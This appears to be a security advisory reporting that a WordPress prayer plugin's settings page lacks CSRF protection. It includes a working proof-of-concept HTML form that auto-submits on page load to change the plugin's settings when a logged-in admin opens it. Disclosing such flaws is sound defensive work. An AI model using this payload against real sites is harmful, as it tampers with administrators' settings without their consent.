Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=caruso_prayer_plugin_settings" method="post">
<input type="hidden" name="form_title" value="CSRF" />
<input type="hidden" name="form_message" value="CSRF" />
<input type="hidden" name="confirm_title" value="CSRF" />
<input type="hidden" name="confirm_message" value="CSRF" />
<input type="hidden" name="action" value="Save Settings" />
<input type="submit" value="Submit" />
</form>
</body>
```